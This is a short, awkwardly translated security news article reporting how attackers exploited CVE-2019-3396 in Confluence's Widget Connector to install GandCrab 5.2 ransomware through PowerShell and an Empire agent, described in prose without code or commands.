Confluence software is a web application based on Java and used by thousands Companies worldwide.
Vulnerability is called CVE-2019-3396 and is located in the software's "Widget Connector". This point allows users to embed YouTube content, Twitter and other pages.
Attackers exploit the vulnerability to introduce malware and manage remote access and execute code in server. According to researchers, all versions of Confluence Server and Confluence Data Center before 6.6.12, 6.12.3, 6.13.3 and 6.14.2, they are vulnerable and therefore allow GandCrab to be installed.
According to a security company report, the proof-of-concept exploit code for vulnerability was released publicly on 10 April. The hackers wasted no time and used it right away attacks. The researchers they said that the first victims appeared in the first week.
The malicious payload, used by hackers on vulnerable Confluence servers, downloads and executes a malicious PowerShell script, aimed at infusing trojans. Next, this script downloads a special version of an open-source PowerShell agent called Empire.
Empire agent is used to inject an executable file (len.exe) into the memory of a current process. Researchers have discovered that this file is GandCrab 5.2, a ransomware program that has infected many companies lately.
In fact, GandCrab is one of the most widespread ransomware currently. It first appeared last January and has targeted a large number users and business. Its creators offer it to other groups as well criminals to carry out attacks.
Many ransomware, including GandCrab, is usually spread through malicious Office documents included in phishing emails.
Distribution by exploiting vulnerabilities in server-type software has been observed in the past. But in most cases, hackers use this method of distribution cryptomining programs.
Currently, there is no tool available to decrypt the files affected by the GandCrab 5.2 version.